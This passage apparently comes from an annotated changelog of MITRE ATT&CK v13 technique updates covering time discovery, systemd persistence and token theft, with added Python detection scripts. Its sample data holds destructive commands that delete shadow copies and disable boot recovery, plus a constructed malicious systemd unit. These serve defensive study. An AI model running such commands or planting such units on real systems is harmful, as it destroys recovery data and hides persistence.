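            "user": ev.user,
            "ts": ev.ts.isoformat(),
            "cmdline": ev.cmdline,
            "severity": "high" if prior else "medium",
            "preceded_by": prior,
        })
    return findings


def _t(hhmm: str) -> datetime:
    return datetime.fromisoformat(f"2023-04-03T{hhmm}:00")


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    ProcEvent(_t("12:00"), "WS01", "CORP\\jdoe", "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent(_t("12:03"), "WS01", "CORP\\jdoe", "bcdedit.exe /set {default} recoveryenabled No"),
    ProcEvent(_t("12:05"), "WS01", "CORP\\jdoe", "shutdown.exe /r /t 0 /f"),
    ProcEvent(_t("13:10"), "WS02", "CORP\\admin", '"C:\\Windows\\System32\\shutdown.exe" /s /t 60'),
    ProcEvent(_t("13:11"), "WS02", "CORP\\admin", "shutdown.exe /a"),
    ProcEvent(_t("09:00"), "WS03", "CORP\\svc", "wmic.exe shadowcopy delete"),
]


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["host"], f["cmdline"], f["preceded_by"])
```

Run as a script it prints one HIGH finding for WS01 (two indicators within five minutes of the reboot) and one MEDIUM finding for WS02; the aborted shutdown and the lone `wmic shadowcopy delete` on WS03 produce nothing. The window is a tuning knob: Nyetya-style wipers reboot almost immediately, while a human operator may wait longer.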

[T1124] System Time Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:
An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. (Citation: Technet Windows Time Service) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)

New Description:
An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.(Citation: Technet Windows Time Service) On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)

Dropped Mitigations:

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
external_references: Cisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['User']
external_references: CAPEC-295
values_changed
STIX Field: Old value → New Value
modified: 2021-04-22 23:09:24.799000+00:00 → 2023-04-12 23:37:22.508000+00:00
description:
Old value: An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
New value: An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
external_references[1]['source_name']: capec → show_clock_detail_cisco_cmd
external_references[1]['url']: https://capec.mitre.org/data/definitions/295.html → https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674
external_references[2]['source_name']: MSDN System Time → AnyRun TimeBomb
external_references[2]['description']: Microsoft. (n.d.). System Time. Retrieved November 25, 2016. → Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.
external_references[2]['url']: https://msdn.microsoft.com/ms724961.aspx → https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/
external_references[4]['source_name']: RSA EU12 They're Inside → MSDN System Time
external_references[4]['description']: Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016. → Microsoft. (n.d.). System Time. Retrieved November 25, 2016.
external_references[4]['url']: https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf → https://msdn.microsoft.com/ms724961.aspx
external_references[5]['source_name']: AnyRun TimeBomb → RSA EU12 They're Inside
external_references[5]['description']: Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021. → Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016.
external_references[5]['url']: https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/ → https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf
x_mitre_data_sources[1]: Process: Process Creation → Process: OS API Execution
x_mitre_data_sources[2]: Process: OS API Execution → Process: Process Creation
x_mitre_detection:
Old value: Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.
New value: Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software. For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New Value
x_mitre_contributors: Austin Clark, @c2defense
x_mitre_platforms: Network
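The v13 detection text for the new Network platform is specific: collect AAA command accounting and look for `show` commands from non-standard users or non-standard locations. On Windows the same technique is a plain command-line match (`net time`, `w32tm /tz`) and needs no special handling; the network side needs a baseline. Below is an added example, not ATT&CK's or Cisco's code, that runs that baseline check over TACACS+ command-accounting records. SAMPLE_LOG is a constructed, tab-separated approximation of tac_plus accounting output (timestamp, NAS address, user, port, client address, start/stop, then key=value attributes); APPROVED_USERS and MGMT_NETS stand in for your own admin accounts and management subnet, and parse_record() is where a different AAA server's layout would be adapted.

```python
"""Baseline check for time discovery on network devices (T1124): flag
`show clock` / `show calendar` / `show ntp ...` in TACACS+ command accounting
when the user is outside the admin baseline or the session originates
outside the management network.

Added example, not ATT&CK's code. SAMPLE_LOG is constructed data.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Commands that reveal the device's time / time zone configuration.
_TIME_CMD_RE = re.compile(r"^show\s+(?:clock|calendar|ntp\s+(?:status|associations))\b", re.I)


@dataclass(frozen=True)
class AcctRecord:
    when: str
    nas_ip: str
    user: str
    client_ip: str
    cmd: str


def parse_record(line: str) -> AcctRecord | None:
    """Parse one accounting line; None for records that carry no command
    (session start records, or lines too short to be accounting records)."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) < 7:
        return None
    when, nas_ip, user, _port, client_ip, event = parts[:6]
    attrs = dict(p.split("=", 1) for p in parts[6:] if "=" in p)
    cmd = attrs.get("cmd", "").replace("<cr>", "").strip()
    if event != "stop" or not cmd:   # command accounting is reported on the stop record
        return None
    return AcctRecord(when, nas_ip, user, client_ip, cmd)


def audit(lines, approved_users, mgmt_nets):
    """Return (record, reasons) for every time-discovery command that breaks the baseline."""
    nets = [ipaddress.ip_network(n) for n in mgmt_nets]
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None or not _TIME_CMD_RE.match(rec.cmd):
            continue
        reasons = []
        if rec.user not in approved_users:
            reasons.append(f"non-standard user {rec.user}")
        src = ipaddress.ip_address(rec.client_ip)
        if not any(src in net for net in nets):
            reasons.append(f"non-standard source {rec.client_ip}")
        if reasons:
            findings.append((rec, reasons))
    return findings


def _rec(when, nas, user, port, client, event, *attrs):
    return "\t".join((when, nas, user, port, client, event, *attrs))


# Constructed sample records (not a real log).
SAMPLE_LOG = [
    _rec("Apr  3 10:15:02 2023", "10.0.0.1", "netops", "tty2", "10.10.1.5", "start",
         "task_id=100", "service=shell"),
    _rec("Apr  3 10:15:09 2023", "10.0.0.1", "netops", "tty2", "10.10.1.5", "stop",
         "task_id=101", "service=shell", "priv-lvl=15", "cmd=show clock detail <cr>"),
    _rec("Apr  3 10:40:33 2023", "10.0.0.1", "svc_backup", "tty3", "10.10.1.9", "stop",
         "task_id=102", "service=shell", "priv-lvl=1", "cmd=show clock detail <cr>"),
    _rec("Apr  3 11:02:47 2023", "10.0.0.2", "netops", "tty1", "192.168.77.20", "stop",
         "task_id=103", "service=shell", "priv-lvl=15", "cmd=show ntp status <cr>"),
    _rec("Apr  3 11:05:10 2023", "10.0.0.2", "svc_backup", "tty3", "10.10.1.9", "stop",
         "task_id=104", "service=shell", "priv-lvl=1", "cmd=show version <cr>"),
]

APPROVED_USERS = {"netops", "admin"}   # assumption: the network team's accounts
MGMT_NETS = ["10.10.1.0/24"]           # assumption: the management subnet


if __name__ == "__main__":
    for rec, reasons in audit(SAMPLE_LOG, APPROVED_USERS, MGMT_NETS):
        print(rec.when, rec.nas_ip, rec.user, rec.client_ip, repr(rec.cmd), "->", "; ".join(reasons))
```

Two of the five records are flagged: `show clock detail` by a backup service account that has no business on the CLI, and `show ntp status` by a legitimate admin coming from an address outside the management subnet. The `show version` from the same service account is not a time-discovery command and is left alone, which keeps the check narrow enough to be actionable; widen `_TIME_CMD_RE` if you want the broader "any show command by a non-standard user" rule the detection text describes.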

[T1543.002] Create or Modify System Process: Systemd Service

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:
Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories and have the file extension <code>.service</code>. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.
* ExecReload directive covers when a service restarts.
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019) While adversaries typically require root privileges to create/modify service unit files in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories, low privilege users can create/modify service unit files in directories such as <code>~/.config/systemd/user/</code> to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)

New Description:
Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). (Citation: lambert systemd 2022) Service unit files use the following directives to execute system commands:(Citation: freedesktop systemd.service)
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives cover execution of commands when a service is started manually by `systemctl`, or on system start if the service is set to automatically start.
* `ExecReload` directive covers when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives cover when a service is stopped.
Adversaries may abuse systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files systemd uses upon reboot or starting a service.(Citation: Anomali Rocke March 2019) Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem. The `.service` file’s `User` directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.(Citation: Rapid7 Service Persistence 22JUNE2016)
Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
external_references: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
external_references: Free Desktop. (n.d.). systemd.service — Service unit configuration. Retrieved March 20, 2023.
dictionary_item_removed
STIX Field: Old value
external_references: CAPEC-550
external_references: CAPEC-551
values_changed
STIX Field: Old value → New Value
modified: 2020-10-09 13:46:29.701000+00:00 → 2023-04-12 20:13:07.604000+00:00
description:
Old value: Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.
* ExecReload directive covers when a service restarts.
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019) While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)
New value: Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). (Citation: lambert systemd 2022) Service unit files use the following directives to execute system commands:(Citation: freedesktop systemd.service)
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives cover execution of commands when a service is started manually by `systemctl`, or on system start if the service is set to automatically start.
* `ExecReload` directive covers when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives cover when a service is stopped.
Adversaries may abuse systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files systemd uses upon reboot or starting a service.(Citation: Anomali Rocke March 2019) Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem. The `.service` file’s `User` directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.(Citation: Rapid7 Service Persistence 22JUNE2016)
external_references[1]['source_name']: capec → Anomali Rocke March 2019
external_references[1]['url']: https://capec.mitre.org/data/definitions/550.html → https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
external_references[2]['source_name']: capec → freedesktop systemd.service
external_references[2]['url']: https://capec.mitre.org/data/definitions/551.html → https://www.freedesktop.org/software/systemd/man/systemd.service.html
external_references[4]['source_name']: Freedesktop.org Linux systemd 29SEP2018 → Berba hunting linux systemd
external_references[4]['description']: Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019. → Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.
external_references[4]['url']: https://www.freedesktop.org/wiki/Software/systemd/ → https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/
external_references[5]['source_name']: Anomali Rocke March 2019 → Rapid7 Service Persistence 22JUNE2016
external_references[5]['description']: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019. → Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.
external_references[5]['url']: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang → https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
external_references[6]['source_name']: Rapid7 Service Persistence 22JUNE2016 → lambert systemd 2022
external_references[6]['description']: Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019. → Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.
external_references[6]['url']: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence → https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/
x_mitre_data_sources[0]: Process: Process Creation → Service: Service Modification
x_mitre_data_sources[2]: Service: Service Creation → File: File Creation
x_mitre_data_sources[3]: File: File Creation → Service: Service Creation
x_mitre_data_sources[4]: File: File Modification → Process: Process Creation
x_mitre_data_sources[5]: Service: Service Modification → File: File Modification
x_mitre_detection:
Old value: Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units --type=service --all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.
New value: Monitor file creation and modification events of Systemd service unit configuration files in the default directory locations for `root` & `user` level permissions. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the `root` user.(Citation: lambert systemd 2022) Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: `systemctl list-units --type=service --all`. Analyze the contents of `.service` files present on the file system and ensure that they refer to legitimate, expected executables, and symbolic links.(Citation: Berba hunting linux systemd) Auditing the execution and command-line arguments of the `systemctl` utility, as well related utilities such as `/usr/sbin/service` may reveal malicious systemd service execution.
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New Value
x_mitre_contributors: Emad Al-Mousa, Saudi Aramco
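Two caveats on the v13 text before applying it. The `/systemd/system` and `/systemd/user` shorthand stands for the concrete directories systemd actually scans: `/etc/systemd/system`, `/run/systemd/system` and `/usr/lib/systemd/system` (plus `/lib/systemd/system` on Debian-derived systems) for the system manager, and `~/.config/systemd/user`, `/etc/systemd/user` and `/usr/lib/systemd/user` for a user manager. And systemd.service(5) documents no `ExecStopPre`; the command-running directives are `ExecStart`, `ExecStartPre`, `ExecStartPost`, `ExecCondition`, `ExecReload`, `ExecStop` and `ExecStopPost`. The added example below (not ATT&CK's, systemd's or any cited author's code) turns the detection guidance into an audit: it parses those directives from every `.service` under a set of unit directories (including the `*.wants/` enablement directories), reports symlinked units whose target lies outside the unit directories, which is the payload-anywhere trick the description mentions, and reports commands that run from scratch or home paths or from outside the usual packaged-binary prefixes, together with the account the unit runs as. `demo()` builds constructed unit files in a temporary directory so the script runs anywhere; point `audit_dirs()` at `SYSTEM_UNIT_DIRS` or `USER_UNIT_DIRS` for a real host.

```python
"""Audit systemd service units for persistence indicators (T1543.002).

Added example, not ATT&CK's or systemd's code. BENIGN_UNIT and EVIL_UNIT are
constructed; demo() writes them into a temporary fake /etc/systemd/system.
"""
from __future__ import annotations

import tempfile
from pathlib import Path

# Where systemd looks for units: system scope, then user scope (relative to $HOME).
SYSTEM_UNIT_DIRS = ["/etc/systemd/system", "/run/systemd/system",
                    "/usr/lib/systemd/system", "/lib/systemd/system"]
USER_UNIT_DIRS = ["~/.config/systemd/user", "/etc/systemd/user", "/usr/lib/systemd/user"]

# Command directives documented in systemd.service(5).
EXEC_DIRECTIVES = {"ExecStart", "ExecStartPre", "ExecStartPost", "ExecCondition",
                   "ExecReload", "ExecStop", "ExecStopPost"}
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/",
                    "/bin/", "/sbin/", "/lib/", "/opt/")
SCRATCH_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")


def parse_unit(text: str) -> dict[str, list[str]]:
    """Return {directive: [values...]} for the [Service] section of a unit file."""
    section, out = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Service" and "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            out.setdefault(key, []).append(value)
    return out


def exec_program(value: str) -> str:
    """Drop systemd's Exec= prefixes (-, @, :, +, !, !!) and return the program path."""
    tokens = value.lstrip("-@:+!").split()
    return tokens[0] if tokens else ""


def audit_unit(path: Path, unit_dirs: list[Path]) -> list[str]:
    """Findings for one unit file; an empty list means nothing unusual."""
    findings: list[str] = []
    if path.is_symlink():
        target = path.resolve()
        # `systemctl enable` links from <target>.wants/ back into a unit dir; a link
        # whose target lives elsewhere loads a payload parked anywhere on disk.
        if not any(target.is_relative_to(d.resolve()) for d in unit_dirs):
            findings.append(f"symlink leaves unit dirs -> {target}")
    directives = parse_unit(path.read_text())
    runs_as = directives.get("User", ["root"])[-1]   # system scope: no User= means root
    for key in sorted(directives.keys() & EXEC_DIRECTIVES):
        for value in directives[key]:
            prog = exec_program(value)
            if not prog:
                continue
            if prog.startswith(SCRATCH_PREFIXES):
                findings.append(f"{key}={prog} runs from scratch/home path as {runs_as}")
            elif not prog.startswith(TRUSTED_PREFIXES):
                findings.append(f"{key}={prog} runs from untrusted path as {runs_as}")
    return findings


def audit_dirs(unit_dirs) -> dict[str, list[str]]:
    """Map unit path -> findings for every *.service under the given directories."""
    dirs = [Path(d).expanduser() for d in unit_dirs]
    report: dict[str, list[str]] = {}
    for d in dirs:
        if not d.is_dir():
            continue
        for unit in sorted(d.rglob("*.service")):
            findings = audit_unit(unit, dirs)
            if findings:
                report[str(unit)] = findings
    return report


BENIGN_UNIT = """[Unit]
Description=Example daemon

[Service]
ExecStart=/usr/bin/env sleep infinity
ExecReload=/bin/kill -HUP $MAINPID
"""

# Constructed unit in the style of the Rocke persistence the description cites.
EVIL_UNIT = """[Unit]
Description=System Update Service

[Service]
ExecStart=-/tmp/.X11-unix/.update --daemon
ExecStopPost=/dev/shm/cleanup.sh
User=root
Restart=always
"""


def demo() -> dict[str, list[str]]:
    """Build a fake /etc/systemd/system tree in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp(prefix="unit-audit-"))
    sys_dir = root / "etc/systemd/system"
    wants = sys_dir / "multi-user.target.wants"
    hidden = root / "opt/.cache"
    for d in (sys_dir, wants, hidden):
        d.mkdir(parents=True)
    (sys_dir / "example.service").write_text(BENIGN_UNIT)
    (wants / "example.service").symlink_to(sys_dir / "example.service")   # normal enablement link
    (hidden / "update.service").write_text(EVIL_UNIT)
    (sys_dir / "update.service").symlink_to(hidden / "update.service")     # payload parked elsewhere
    return audit_dirs([sys_dir])


if __name__ == "__main__":
    for unit, findings in demo().items():
        print(unit)
        for f in findings:
            print("  -", f)
```

Only `update.service` is reported, with three findings: the symlink that escapes the unit directories, an `ExecStart` under `/tmp`, and an `ExecStopPost` under `/dev/shm`, all running as root. The enablement symlink in `multi-user.target.wants/` is correctly ignored because it resolves back into the unit directory. Compare the output against a known-good baseline from a freshly provisioned host of the same build, as the detection text suggests, rather than treating every `/opt` service as suspect.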

[T1134.001] Access Token Manipulation: Token Impersonation/Theft

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread. An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.

New Description:
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system. When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors: ['Jonny Johnson']
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-26 21:29:18.608000+00:00 → 2023-04-11 21:19:05.544000+00:00
description:
Old value: Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
New value: Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread. An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system. When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
x_mitre_version: 1.0 → 1.1

[T1020.001] Automated Exfiltration: Traffic Duplication

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may leverage traffic mirroring in order to automt1Adversaries may leverage traffic mirroring in order to autom
>ate data exfiltration over compromised network infrastructur>ate data exfiltration over compromised infrastructure. Traff
>e.  Traffic mirroring is a native feature for some network d>ic mirroring is a native feature for some devices, often use
>evices and used for network analysis and may be configured t>d for network analysis. For example, devices may be configur
>o duplicate traffic and forward to one or more destinations >ed to forward network traffic to one or more destinations fo
>for analysis by a network analyzer or other monitoring devic>r analysis by a network analyzer or other monitoring device.
Old Description (remainder):
